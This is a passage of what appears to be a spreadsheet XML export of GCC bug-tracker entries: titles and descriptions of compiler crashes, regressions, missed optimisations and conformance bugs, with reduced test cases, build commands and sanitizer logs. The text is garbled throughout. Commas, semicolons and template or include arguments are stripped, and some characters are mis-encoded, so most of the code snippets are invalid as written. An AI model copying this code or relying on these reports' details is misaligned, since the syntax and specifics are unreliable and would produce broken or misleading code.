We're applying the thrown object's dtor (~B) to the caught
type (A)</t>
  </si>
  <si>
    <t>GCC-56047</t>
  </si>
  <si>
    <t>[4.8 Regression] [OOP] ICE in in gfc_conv_expr_op</t>
  </si>
  <si>
    <t>Created attachment 29220
File that triggers the ICE
I get the following ICE:
gfortran  -c process_libraries.f90
process_libraries.f90: In function â€˜process_variant_def_allocate_by_nameâ€™:
process_libraries.f90:47:0: internal compiler error: in gfc_conv_expr_op at fortran/trans-expr.c:2469
       if (template%type_string () == name) then
 ^
process_libraries.f90:47:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
In the code attached iso_varying_string.f90 is the standard implementation:
http://www.fortran.com/iso_varying_string.f95</t>
  </si>
  <si>
    <t>GCC-32868</t>
  </si>
  <si>
    <t>Don't warn about redefinitions of __STDC_FORMAT_MACROS</t>
  </si>
  <si>
    <t>Compiling this C or C++ file:
#define __STDC_FORMAT_MACROS 1
#define __STDC_FORMAT_MACROS 1
produces these warnings:
foo.c:2:1: warning: __STDC_FORMAT_MACROS redefined
foo.c:1:1: warning: this is the location of the previous definition
This is because of these lines in libcpp/macro.c:
  if (! ustrncmp (NODE_NAME (node) DSC (__STDC_)))
    node-&gt;flags |= NODE_WARN
The idea behind these lines is sound: the compiler defines macros whose name begins with __STDC_.  The user should not redefine them.
However __STDC_FORMAT_MACROS is an exception here.  This macro is not defined by the compiler.  It is intended to be defined by the user when compiling a C++ file to direct the  header file to define macros PRId32 and friends.  See footnote 182 in section 7.8.1 in C99.
If the user defines the macro in a .h file as is permitted then including that some .h file twice if it does not have an include guard will give an inappropriate warning.  In particular this can happen with an autoconf-style config.h file as autoconf does not generate include guards for such files.
I expect that the right fix is to specifically exclude __STDC_FORMAT_MACROS from this warning.  Or perhaps another approach would be to specially mark the macros defined in cpp_init_builtins.</t>
  </si>
  <si>
    <t>GCC-8281</t>
  </si>
  <si>
    <t>[3.2 regression] [Sparc] ICE when compiling with -O2 -fPIC for Ultrasparc</t>
  </si>
  <si>
    <t>PR 7151 was fixed and patch is merged into gcc-3.2 branch in Oct 1.
But another(?) error happens at the same place.
gcc -o e_pow.o -c -DOSTYPE=\SunOS5\ -DOSARCH=\SunOS\ -DOJI   -I../../../dist/include/js -I../../../dist/include -I/home/yasuaki/Down/com/mozilla/mozilla/dist/include/nspr      -I/usr/openwin/include   -fPIC -I/usr/openwin/include -Wno-long-long -pthreads  -DNDEBUG -DTRIMMED -O2 -D_IEEE_LIBM  -I/usr/openwin/include -include ../../../mozilla-config.h -DMOZILLA_CLIENT -Wp-MD.deps/e_pow.pp e_pow.c
e_pow.c: In function `__ieee754_pow':
e_pow.c:376: internal error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc-cvs 3.2.1 prerelease 20021018
Environment:
SunOS wind 5.9 Generic_112233-02 sun4u sparc SUNWSun-Blade-100
[yasuaki@wind yasuaki]$ gcc -v
Reading specs from /usr/local/gcc-cvs/lib/gcc-lib/sparc-sun-solaris2.9/3.2.1/specs
Configured with: ../gcc-cvs/gcc/configure --enable-languages=cc++ --enable-shared --enable-threads=solaris --with-cpu=ultrasparc --prefix=/usr/local/gcc-cvs
Thread model: solaris
gcc version 3.2.1 20021018 (prerelease)</t>
  </si>
  <si>
    <t>yasuaki</t>
  </si>
  <si>
    <t>GCC-83438</t>
  </si>
  <si>
    <t>[8 Regression] 435.gromacs miscompares</t>
  </si>
  <si>
    <t>435.gromacs started to miscompare with -Ofast -flto -march=haswell.
*** Miscompare of gromacs.out see /home/gcc/spec/cpu2006/benchspec/CPU2006/435.gromacs/run/run_peak_ref_x86_64-linux.0000/gromacs.out.mis
0002:  3.07684e+02
       3.12561e+02
                 ^
last known good rev. is r255372 first known bad is r255400.
VRP and combine show up:
Updating SVN tree
Updating '.':
U    libstdc++-v3/include/std/streambuf
U    libstdc++-v3/include/std/bitset
U    libstdc++-v3/include/bits/codecvt.h
U    libstdc++-v3/include/bits/boost_concept_check.h
U    libstdc++-v3/include/bits/locale_facets_nonio.tcc
U    libstdc++-v3/include/bits/regex_compiler.tcc
U    libstdc++-v3/ChangeLog
U    libstdc++-v3/testsuite/24_iterators/operations/prev_neg.cc
U    libstdc++-v3/config/io/basic_file_stdio.h
U    libatomic/configure
U    libatomic/Makefile.in
U    libatomic/configure.ac
U    libatomic/auto-config.h.in
U    libatomic/configure.tgt
U    libatomic/ChangeLog
U    libatomic/libatomic_i.h
A    libatomic/config/linux/aarch64
A    libatomic/config/linux/aarch64/host-config.h
U    libatomic/Makefile.am
U    gcc/graphite-isl-ast-to-gimple.c
U    gcc/DATESTAMP
U    gcc/lra.c
U    gcc/gimple-ssa-evrp.c
U    gcc/ChangeLog
U    gcc/testsuite/gcc.dg/pr82875.c
A    gcc/testsuite/gcc.dg/graphite/pr83255.c
A    gcc/testsuite/gcc.dg/graphite/pr83238.c
A    gcc/testsuite/gcc.dg/builtin-unreachable-6a.c
U    gcc/testsuite/gcc.dg/builtin-unreachable-6.c
U    gcc/testsuite/gcc.dg/tree-ssa/20030922-2.c
U    gcc/testsuite/gcc.dg/tree-ssa/ssa-dom-branch-1.c
U    gcc/testsuite/ChangeLog
U    gcc/testsuite/g++.dg/cpp1z/constexpr-if12.C
A    gcc/testsuite/g++.dg/cpp1z/constexpr-if13.C
U    gcc/cp/constexpr.c
U    gcc/cp/ChangeLog
U    gcc/cp/semantics.c
U    gcc/ipa-pure-const.c
U    gcc/tree-ssa-dom.c
U    gcc/go/gofrontend/parse.cc
U    gcc/go/gofrontend/MERGE
A    gcc/ada/libgnat/s-osprim__rtems.adb
U    gcc/ada/libgnarl/s-osinte__rtems.ads
U    gcc/ada/ChangeLog
U    gcc/ada/gcc-interface/Makefile.in
U    gcc/graphite-scop-detection.c
U    gcc/combine.c
U    gcc/gimple-ssa-evrp-analyze.c
U    gcc/gimple-ssa-evrp-analyze.h
U    gcc/config/sparc/sparc.c
U    gcc/config/i386/athlon.md
U    gcc/config/i386/x86-tune-sched.c
U    gcc/config/i386/haswell.md
U    gcc/config/i386/i386.c
U    gcc/config/riscv/riscv.c
U    gcc/config/riscv/riscv.h
U    gcc/config/rs6000/rs6000.c
Updated to revision 255400.</t>
  </si>
  <si>
    <t>GCC-63149</t>
  </si>
  <si>
    <t>wrong auto deduction from braced-init-list</t>
  </si>
  <si>
    <t>Reduced testcase:
namespace std {
  template struct initializer_list {
    const T *p unsigned long n
    initializer_list(const T *p unsigned long n)
  }
}
struct vector { vector(std::initializer_list) }
void f(vector)
const auto 
int main() { f(r) }
GCC rejects-valid here saying: 
:10:15: error: could not convert â€˜râ€™ from â€˜const std::initializer_listâ€™ to â€˜vectorâ€™
Replacing
  const auto 
with any of
  const std::initializer_list 
  auto 
  auto r = {1 2 3}
... makes the problem disappear so it seems that the 'const' from the reference is somehow getting muddled into the</t>
  </si>
  <si>
    <t>GCC-68357</t>
  </si>
  <si>
    <t>[6 Regression] FAIL: g++.dg/other/darwin-cfstring1.C  -std=* (internal compiler error) on x86_64-apple-darwin1(0|4|5)</t>
  </si>
  <si>
    <t>At revision r230384 compiling the test g++.dg/other/darwin-cfstring1.C gives the ICE
[Book15] f90/bug% g++6 /opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C -std=gnu++98 -ftrack-macro-expansion=0 -mconstant-cfstrings
/opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C: In function 'int main()':
/opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C:21:20: error: CFString literal expression is not a string constant
   CFStringRef s2 = CFSTR(cond? Str2: Str3) /* { dg-error CFString literal expression is not a string constant } */
                    ^~~~~
/opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C:22:20: error: CFString literal expression is not a string constant
   CFStringRef s3 = CFSTR(func())  /* { dg-error CFString literal expression is not a string constant } */
                    ^~~~~
/opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C:21:20: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in useless_type_conversion_p at gimple-expr.c:83
   CFStringRef s2 = CFSTR(cond? Str2: Str3) /* { dg-error CFString literal expression is not a string constant } */
                    ^~~~~
/opt/gcc/_clean/gcc/testsuite/g++.dg/other/darwin-cfstring1.C:21:20: internal compiler error: Abort trap: 6
Revision r230359 is OK.</t>
  </si>
  <si>
    <t>GCC-21787</t>
  </si>
  <si>
    <t>flush I/O before calling abort()</t>
  </si>
  <si>
    <t>When I compile and try to run one of my programs with gfortran all I get as
output from libfortran is Abort - not very informative -
 row  col          x           y                          xg          yg          zg
   1    1          0.0000      0.0000                     0.0000      0.0000   
  0.0000
   1   11          0.0000     50.0000                     0.0000     50.0000   
  0.0000
   2    1          1.0000      0.0000                     1.0000Abort
END OF END OF END OF END OF END OF  test1.in</t>
  </si>
  <si>
    <t>GCC-29467</t>
  </si>
  <si>
    <t>-ansi -pedantic accepts _Bool without diagnostic</t>
  </si>
  <si>
    <t>_Bool x</t>
  </si>
  <si>
    <t>GCC-48640</t>
  </si>
  <si>
    <t>gcc: tree-cfg.c: 2992: operand in in TARGET_MEM_REF</t>
  </si>
  <si>
    <t>Minor typo (double in) in tree-cfg.c: 2992.</t>
  </si>
  <si>
    <t>GCC-20405</t>
  </si>
  <si>
    <t>[meta-bug] equivalenced variable problems</t>
  </si>
  <si>
    <t>There are currently two equivalenced variable problems but I suspect there are more which is why I am 
creating this meta-bug.</t>
  </si>
  <si>
    <t>GCC-59378</t>
  </si>
  <si>
    <t>Internal compiler error when using __builtin_shuffle in a template function</t>
  </si>
  <si>
    <t>The g++ compiler crashes on an internal error when instantiating a template function or class that uses the gcc vector extensions and __builtin_shuffle(). See attachment.
The error message when instantiating a template function:
test.cpp:4:23: internal compiler error: in make_decl_rtl at varasm.c:1140
The error message when instantiating a template class:
test2.cpp:5:17: internal compiler error: in gimple_expand_cfg at cfgexpand.c:4575</t>
  </si>
  <si>
    <t>GCC-48852</t>
  </si>
  <si>
    <t>Invalid spaces in list-directed output of complex constants</t>
  </si>
  <si>
    <t>There are invalid spaces in complex constants in list-directed output:
print * (1.0 0.0) !  (  1.00000000      0.00000000    ) expected  (1.000000000.00000000)
Fortran 2003/2008:
Real constants are produced with the effect of either an F edit descriptor or an E edit descriptor depending on the magnitude x of the value and a range 10^d1 &lt;= x &lt; 10^d2 where d1 and d2 are processor-dependent integers. If the magnitude x  is within this range or is zero the constant is produced using 0PFw.d otherwise 1PEw.d Ee is used.
Complex constants are enclosed in parentheses with a separator between the real and imaginary parts each produced as defined above for real constants. The separator is a comma if the decimal edit mode is POINT it is a semicolon if the decimal edit mode is COMMA. The end of a record may occur between the separator and the imaginary part only if the entire constant is as long as or longer than an entire record. The only embedded blanks permitted within a complex constant are between the separator and the end of a record and one blank at the beginning of the next record.
Part of the problem is caused by GFortran using Gw.dEe editing instead of the Fw.d editing required by the standard (i.e. appending the n blanks at the end). This is a waste of space for real constants and an outright bug for complex constant.</t>
  </si>
  <si>
    <t>GCC-21929</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid template parameter</t>
  </si>
  <si>
    <t>For the following invalid code snippet I get an ICE since gcc 4.0.0:
====================================
template struct A
{
    struct B
}
template struct A::B {}
====================================
bug.cc:6: error: type/value mismatch at argument 1 in template parameter list
for 'template &gt; struct A'
bug.cc:6: error:   expected a constant of type 'int' got 'void'
bug.cc:6: internal compiler error: in cp_parser_diagnose_invalid_type_name at
cp/parser.c:2103
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-83319</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE on use of allocatable component in derived type coarray defined in module</t>
  </si>
  <si>
    <t>Presumably the internal compiler error (ICE) demonstrated below is somehow related to the known regression in support for allocatable components in derived type coarrays which is issue 422 on the OpenCoarrays repository. OpenCoarrays issue 422 however generates a runtime error message inside the coarray ABI whereas this issue generates a compile-time error message so it's a compiler-side problem.  Also OpenCoarrays issue 422 involves communication whereas this is much more basic: the ICE appears when I do anything with the allocatable component so this is an even more serious regression on top of the already very serious regression described in issue 422.  (Besides allocating the component as shown below I also tried a source allocation and an assignment to it.)  The ICE disappears if the derived type definition is moved into the main program.
This is somewhat similar to PR 78935 but 78935 was fixed 11 months ago and this seems sufficiently different to warrant a separate PR rather than reopening 78935.
This ICE occurs with today's 7 branch with 7.2.0 and with the trunk dated 20170921.  The code compiles cleanly with GCC 6.4.0.
$ cat allocatable-component-of-dt-coarray.f90 
module foo_module
  implicit none
  type foo
    integer allocatable :: i(:)
  end type
end module
  use foo_module
  implicit none
  type(foo) save :: bar[*]
  allocate(bar%i(1))
end
$ gfortran -fcoarray=lib -c allocatable-component-of-dt-coarray.f90 
allocatable-component-of-dt-coarray.f90:8:0:
   use foo_module
internal compiler error: in gfc_conv_descriptor_token at fortran/trans-array.c:305
0x6a9130 gfc_conv_descriptor_token(tree_node*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-array.c:303
0x6d6858 gfc_trans_structure_assign(tree_node* gfc_expr* bool bool)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-expr.c:7567
0x6d0b47 gfc_conv_structure(gfc_se* gfc_expr* int)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-expr.c:7686
0x6df17e gfc_trans_assignment_1
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-expr.c:9984
0x6be5ff generate_coarray_sym_init
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-decl.c:5188
0x68dc72 do_traverse_symtree
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/symbol.c:4009
0x6bdc95 generate_coarray_init
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-decl.c:5238
0x6c9954 gfc_generate_function_code(gfc_namespace*)
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/trans-decl.c:6273
0x65b736 translate_all_program_units
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/parse.c:6074
0x65b736 gfc_parse_file()
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/parse.c:6274
0x69ff5f gfc_be_parse_file
	/home/rouson/Desktop/Builds/opencoarrays/prerequisites/downloads/gcc-7-branch/gcc/fortran/f95-lang.c:204
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gfortran --version
GNU Fortran (GCC) 7.2.1 20171208</t>
  </si>
  <si>
    <t>GCC-52016</t>
  </si>
  <si>
    <t>[OOP] Polymorphism and elemental: missing diagnostic</t>
  </si>
  <si>
    <t>This PR is probably a duplicate of pr52013 with a fix before submission (see http://gcc.gnu.org/ml/fortran/2012-01/msg00224.html -).
While investigating why the test in pr50981 comment #23 was yielding an ICE even with the patch from http://gcc.gnu.org/ml/fortran/2012-01/msg00223.html  I reduced the origin of the ICE to the following test
    type t
      integer :: a
    end type t
  type(t) allocatable :: var1 var2(:)
  allocate(var1 var2(2))
  call sub_ctae(var2)
 if (any (var2%a /= 9)) call abort()
contains
  elemental subroutine sub_ctae(y)
    class(t) intent(inout) optional :: y(:) ! &lt;-- invalid and gives an ICE
!    class(t) intent(inout) optional :: y ! &lt;-- valid and works
    if (present(y)) y%a = 9
    if (present(y)) i = 7
  end subroutine sub_ctae
end
which gives
pr50981_4_red.f90: In function 'sub_ctae':
pr50981_4_red.f90:13:0: internal compiler error: in gfc_conv_descriptor_data_get at fortran/trans-array.c:147
for an unpatched r183306 and
pr50981_4_red.f90: In function 'MAIN__':
pr50981_4_red.f90:6:0: internal compiler error: in fold_convert_loc at fold-const.c:2016
for my patched tree.</t>
  </si>
  <si>
    <t>GCC-81743</t>
  </si>
  <si>
    <t>int __attribute__ ((target(arch=westmere))) is compiled incorrectly</t>
  </si>
  <si>
    <t>For g++.dg/ext/mv16.C GCC generates:
[hjl@gnu-tools-1 gcc]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../xg++ -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../ /export/gnu/import/git/sources/gcc/gcc/testsuite/g++.dg/ext/mv16.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/libstdc++-v3/include/x86_64-pc-linux-gnu -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/libstdc++-v3/include -I/export/gnu/import/git/sources/gcc/libstdc++-v3/libsupc++ -I/export/gnu/import/git/sources/gcc/libstdc++-v3/include/backward -I/export/gnu/import/git/sources/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++14 -O2 -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/./libstdc++-v3/src/.libs -B/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/./libstdc++-v3/src/.libs -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/./libstdc++-v3/src/.libs -B/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/./libitm/ -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-pc-linux-gnu/./libitm/.libs -S
	.type	_Z3foov.resolver @function
_Z3foov.resolver:
.LFB11:
	.cfi_startproc
	subq	$8 %rsp
	.cfi_def_cfa_offset 16
	call	__cpu_indicator_init
	cmpl	$13 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_haswell %eax
	jne	.L29
.L19:
	addq	$8 %rsp
	.cfi_remember_state
	.cfi_def_cfa_offset 8
	ret
	.p2align 410
	.p2align 3
.L29:
	.cfi_restore_state
	cmpl	$14 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_broadwell %eax
	je	.L19
	cmpl	$15 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_skylake %eax
	je	.L19
	cmpl	$16 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_skylake_avx512 %eax
	je	.L19
	cmpl	$3 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_sandybridge %eax
	je	.L19
	cmpl	$12 __cpu_model+8(%rip)
	movl	$_Z3foov.arch_ivybridge %eax
	je	.L19
	cmpl	$3 __cpu_model+4(%rip)
	movl	$_Z3foov.arch_nehalem %eax
	je	.L19  &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; This is wrong.  Nehalem and Westmere have
the same CPU type.
	cmpl	$2 __cpu_model+8(%rip)
	movl	$_Z3foov %eax
	movl	$_Z3foov.arch_westmere %edx
	cmove	%rdx %rax
	jmp	.L19
	.cfi_endproc
.LFE11:
	.size	_Z3foov.resolver .-_Z3foov.resolver</t>
  </si>
  <si>
    <t>GCC-13699</t>
  </si>
  <si>
    <t>Extern C routine in different namespaces accepted with different exception signature</t>
  </si>
  <si>
    <t>G++ compiler does not issue any error on the standard-violating code listed 
below regardless of pedantry level.
	namespace A {
	    extern C void foo() throw()
	}
	extern C void foo()
Details
-------
According to the C++ Standard two declarations for a function with C language 
linkage with the same function name... that appear in different namespace 
scopes refer to the same function [7.5/6] 
Next if any declaration of a function has an exception-specification all 
declarations including the definition.. of that function shell have an 
exception-specification with the same set of type-ids [15.4/2]
In our example two declarations of the same extern C routine 'foo' have 
different exception-specifications. This is the C++ standard violation.
However G++ compiler silently compiles this code. This makes to think 
extern C routine in different namespaces is not the same entity for g++.</t>
  </si>
  <si>
    <t>GCC-9</t>
  </si>
  <si>
    <t>local class and -O1</t>
  </si>
  <si>
    <t>[Original report in ]
I'm not sure if this a bug but g++ with -O0 accept it but fail to link
with -O1.
g++ --verbose -O1 prog.cc
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/specs
gcc version 2.95.1 19990816 (release)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cpp -lang-c++ -v
-D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__
-Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__
-D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__
-Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686
-Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ prog.cc
/tmp/cc1V6mke.ii
GNU CPP version 2.95.1 19990816 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../include/g++-3
 /usr/local/include
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../i686-pc-linux-gnu/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/include
 /usr/include
End of search list.
The following default directories have been omitted from the search
path:
End of omitted list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cc1plus
/tmp/cc1V6mke.ii -quiet -dumpbase prog.cc -O1 -version -o
/tmp/cc9xhG3f.s
GNU C++ version 2.95.1 19990816 (release) (i686-pc-linux-gnu) compiled
by GNU C version 2.95.1 19990816 (release).
 as -V -Qy -o /tmp/ccMLXzsi.o /tmp/cc9xhG3f.s
GNU assembler version 2.9.1 (i386-redhat-linux) using BFD version
2.9.1.0.23
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/collect2 -m elf_i386
-dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/crtbegin.o
-L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1
-L/usr/local/i686-pc-linux-gnu/lib -L/usr/local/lib /tmp/ccMLXzsi.o
-lstdc++ -lm -lgcc -lc -lgcc
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/crtend.o /usr/lib/crtn.o
/tmp/ccMLXzsi.o(.gnu.linkonce.d.__vt_Q29bar__Fv.0_1D+0x8): undefined
reference to `f__CQ29bar__Fv.0_1D.6'
collect2: ld returned 1 exit status
gcc version 2.96 20000221 (experimental) gives the same result.
Release:
unknown
Environment:
System: Linux mira 2.3.48 #4 Sun Feb 27 23:26:02 CET 2000 i586 unknown
Architecture: i586
How-To-Repeat:
class B
{
public:
    virtual void f() const = 0
}
void
foo(B const &amp;)
{
}
void
bar()
{
  class D : public B
  {
    void f() const
      {
      }
  }
 foo (D())
}
int
main() 
{
  bar()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-67900</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Interface bug: Binding parameters to C causes a compiler segmentation fault.</t>
  </si>
  <si>
    <t>Created attachment 36465
Compiling this file will cause the compiler to segmentation fault.
A simple interface declaration in which the parameter names are the same and are binding to C causes the compiler to segfault. Usually when declaring a generic interface that does the same operation on varied types it is good practice to give the parameters the same name.
The program:
program main
        implicit none
        interface f
                function f_real(x)
                        real bind(c) :: x
                        real :: f_real
                end function f_real
                function f_integer(x)
                        integer bind(c) :: x
                        integer :: f_integer
                end function f_integer
        end interface f
end program main
Info about gcc:
$ gcc --version
gcc (GCC) 5.1.1 20150618 (Red Hat 5.1.1-4)
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Basic machine info:
$ uname -a
Linux localhost.localdomain 4.1.8-200.fc22.x86_64 #1 SMP Tue Sep 22 12:13:21 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>giorgianb</t>
  </si>
  <si>
    <t>GCC-19703</t>
  </si>
  <si>
    <t>[4.0 Regression] Poor optimisation of loop test DOM causing unsigned to int and missing combine compares</t>
  </si>
  <si>
    <t>Missed optimization
gcc version 4.0.0 20041205 (experimental)
4.0.0/cc1.exe -quiet -v looprv.c -quiet -dumpbase
looprv.c -mmcu=atmega169 -auxbase looprv -Os -Wall -version -funsigned-char
-funsigned-bitfields -fpack-struct -fshort-enums -o looprv.s
Down counting loop uses expensive compare EQ (-n) instead of compare &gt;=0.
Testcase as follows:
volatile char  value6
extern void foo6(char)
void testloop6(void)
{
int i
for (i=100i&gt;= 0i-=10)
{
   if (!value6)
   {
       foo6(i)
   } 
}
Loop test in RTL is compare NE -10. It should be compare GE 0 - which
is(generally) free. First dump of Expanded RTL show the compare.</t>
  </si>
  <si>
    <t>andrewhutchinson</t>
  </si>
  <si>
    <t>GCC-15271</t>
  </si>
  <si>
    <t>use of nested template classes generates internal error</t>
  </si>
  <si>
    <t>Configuration:
Configured with: /ipl/srcs/gnu/gcc-3.3.1/configure
--prefix=/ipl/inst01/gnu/gcc-3.3.1 --with-gnu-ld
--with-ld=/ipl/inst01/gnu/binutils-2.14/bin/ld --with-gnu-as
--with-as=/ipl/inst01/gnu/binutils-2.14/bin/as
Thread model: posix
gcc version 3.3.1
Compilation of the below code with:
 g++ -c bug bug.cc
generates the following error message:
bug.cc: In function `BGvec_base operator*(k_t const 
   BGvec_base&amp;) [with k_t = double int Dimension = 2 
   coeff_t = double]':
bug.cc:31:   instantiated from here
bug.cc:25: internal compiler error: in tsubst at cp/pt.c:6739
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Thank you.  As always you have my deep appreciation.
template
class BGvec_base{
        public:
        //default constructor default copy constructor default assignment
        double }
        const double }
        template
        class Ktimes : public BGvec_base{
                public:
                Ktimes( k_t k const BGvec_base&amp; A ){
                        for(int i=0 i&lt;Dimension ++i) v[i] = k*A[i]
                }
        }
        protected:
        coeff_t v[Dimension]
}
template
BGvec_base operator*
                        ( k_t k const BGvec_base&amp; A)
{
        return BGvec_base::Ktimes (kA)
}
int main(int argc char *argv[])
{
        BGvec_base A A[0] = 5.0 A[1] = 7.0
        BGvec_base B = 2.0*A
}</t>
  </si>
  <si>
    <t>albert</t>
  </si>
  <si>
    <t>GCC-59545</t>
  </si>
  <si>
    <t>Signed integer overflow issues</t>
  </si>
  <si>
    <t>I ran bootstrap with -fsanitize=undefined here's a list of issues I've found.
combine.c:8204:6: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
combine.c:8204:6: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
double-int.c:141:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
double-int.c:141:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
double-int.c:141:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
double-int.c:141:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int' cast to an unsigned type to negate this value to itself
genattrtab.c:622:27: runtime error: signed integer overflow: 4568797 * 613 cannot be represented in type 'int'
genautomata.c:3497:23: runtime error: shift exponent 64 is too large for 64-bit type 'long unsigned int'
ifcvt.c:1116:18: runtime error: signed integer overflow: -9223372036854775808 - 9223372036854775807 cannot be represented in type 'long int'
ifcvt.c:1116:18: runtime error: signed integer overflow: -9223372036854775808 - 9223372036854775807 cannot be represented in type 'long int'
ira-color.c:1508:29: runtime error: signed integer overflow: -12123975 * 185 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -128583990 * 811 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -128583990 * 811 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -128583990 * 811 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -128583990 * 811 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 590 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 590 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 590 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -131071000 * 590 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -13238070 * 808 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -134813175 * 122 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -14909212 * 910 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -15417108 * 941 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -16383750 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -16383750 * 1000 cannot be represented in type 'int'
ira-color.c:1508:29: runtime error: signed integer overflow: -16383750 * 1000 cannot be represented in type 'int'
